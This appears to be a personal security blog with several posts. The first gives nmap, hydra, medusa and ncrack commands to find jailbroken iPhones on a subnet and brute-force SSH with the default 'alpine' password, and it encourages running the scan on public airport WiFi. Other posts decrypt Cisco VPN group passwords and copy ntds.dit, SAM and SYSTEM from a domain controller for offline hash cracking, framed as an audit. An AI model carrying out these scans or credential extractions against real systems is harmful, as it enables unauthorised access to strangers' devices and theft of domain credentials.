Friday, November 4, 2016

Scan a subnet to find out jailbreak iPhone with default password

After jailbreak, most of the users will install OPENSSH on their IOS device. However, some of the users might not know or just forgot to change the default password. Below is the user list of an iPhone:

The default password of the username root and mobile is “alpine”.

So our goal is to scan a whole subnet and find if there are any jailbroken IOS devices can be SSH login with the default username and password.

Tools: nmap (v7.01)  , hydra (v8.1) or medusa (v2.2) or ncrack (v0.4ALPHA).

1.     Connect your computer to the wireless network and find out the IP range:

2.     Use nmap to generate a hosts list: nmap -sL | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst

3.     Or if you only want to scan the live hosts, you can use command: nmap -sP -n | grep "Nmap scan report"| awk '{print $NF}' > liveHosts.lst

4.     Create 2 text files: username.txt and password.txt

5.     Run command: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh

6.     It took 12 minutes to get the password:

7.     Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh

8.     Ncrack also can do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude And you can press 'p' to list discovered credentials during the scan.

Following the steps above, you can easily modify the username and password file to perform a dictionary or brute force attack.

Ok, that’s it. Next time, you go to an airport, connect your Kali Linux to the free WIFI, have a cup of coffee and scan the whole subnet. You might be surprised. 

BTW, to change the password, just ssh to the iPhone with root and use command “passwd” and “passwd mobile”

Friday, July 15, 2016

Check Your Google account activity

It is a good security practice to check your Google Account activity history regularly.

1. Check Gmail login history
  1) Login to Gmail box, scroll down to the end of page, on the right-end side, there is a “Details” link.

 2) Click “Details”, brings you the Gmail login history:

    3) In case someone login to your account from other place, you can click “Sign out all other web sessions” to sign them out.
    4) It is recommended to select the “Show an alert for unusual activity.” Option.

2. Check Recently used devices
  1) Login to your Google account
  2) Open (Copy & paste) this link:
  3) The page lists devices that have been active on your account in the last 28 days.

3. Check All activity history including web browsing:
  1) Login to your Google account.
  2) Open (Copy & paste) this link:

Wednesday, June 29, 2016

Extract Cisco VPN group Password from .pcf file

So you got a .pcf file, it is easy to just copy it to the Cisco VPN folder in Windows. But for MacBook, you still need the Group password to set it up. 

In .pcf file, the Group Password is encrypted. You may want to decrypt the string to get the clear text password. There are some online Websites can do the job, however, you normally don’t want to submit this kind of information to public. 

Kali has the tool to decrypt it. Simply enter: 

#cisco-decrypt [Encrypted Group Password String]

Saturday, April 23, 2016

Windows Password Audit – Copy ntds.dit

 Company should do the password audit annually.

The process normally is:

  1. Login to domain controller, export ntds.dit, SAM and SYSTEM using shadow copy.
  2. Extract Hashes from above files. (use tool NTDSXtract - or SANS Investigative Forensic Toolkit (SIFT) -
  3. Use offline cracking tool to crack the hashes: Cain, ophcrack etc.
The weak password can be defined as below:

  1.  All LM hashes are considered as weak.
  2. The password is considered as short and weak if its length is less than 8.
  3. Repeatable sequence of a character. eg. ‘111111’, ‘aaaaaa’, are considered as weak.
  4. Simple patterns, eg. ‘123456’, ‘abcdefgh’, are considered as weak.
  5. Keyboard combinations patterns. Based on all possible keyboard combinations like ‘qwerty’, ‘qazwsx’, etc.
  6. National keyboard combinations patterns. The same as previous but uses national keyboard layout.
  7. User name mutations patterns. For passwords based on user name.
  8. “Freaked” passwords, eg. ‘pa$$w0rd”, ‘@pp1e’ etc.
  9. Dictionary attack against well-known passwords, eg. ‘leaking facebook, LinkedIn, eHarmony passwords’, which can be downloaded from Internet.

Step 1:  Create shadow copy for copying password files

  1. Log on to a domain controller as a member of the Enterprise Admins groups or the Domain Admins group.
  2. Click Start, right-click Command Prompt, and then click Run as administrator
  3. If the User Account Control dialog box appears, confirm that the action it displays is what you want, and then click Continue.
  1. At the elevated command prompt, type the following command, and then press ENTER: ntdsutil
  1. At the ntdsutil prompt, type the following command, and then press ENTER: snapshot
  1. At the snapshot prompt, type the following command, and then press ENTER:
activate instance ntds
  1. At the snapshot prompt, type the following command, and then press ENTER:
The command returns the following output:
Snapshot set {GUID} generated successfully.
Where GUID is the globally unique identifier (GUID) for the snapshot.
  1. At the snapshot prompt, type the following command, and then press ENTER:
mount { GUID }
  1. As an option, to see a list of all mounted snapshots, you can type the following command, and then press ENTER:
list mounted
The output lists each mounted snapshot and a corresponding index number. You can use the index number instead of the GUID to subsequently mount, unmount, or delete the snapshot.

  1. Open another command line windows with Administrator.
  2. Run below commands:

E:\temp>copy c:\$SNAP_201603102306_VOLUMEC$\Windows\ntds\ntds.dit
       1 file(s) copied.
E:\temp>copy c:\$SNAP_201603102306_VOLUMEC$\windows\system32\config\SYSTEM
        1 file(s) copied.
E:\temp>copy c:\$SNAP_201603102306_VOLUMEC$\windows\system32\config\SAM
        1 file(s) copied.
E:\temp>reg SAVE HKLM\SYSTEM .\sys

  1. Copy these 4 files to a USB drive.
  2. To unmount the snapshot after you have finished viewing the data, type either of the following commands, and then press ENTER:
unmount index #
unmount { GUID }
  1. Delete old snapshots that you are no longer using because they consume disk space. To delete a snapshot, type either of the following commands, and then press ENTER:
delete index #
delete { GUID }
  1. After you are done with snapshot operations, type quit to return to the ntdsutil menu, and then type quit again to return to the command prompt.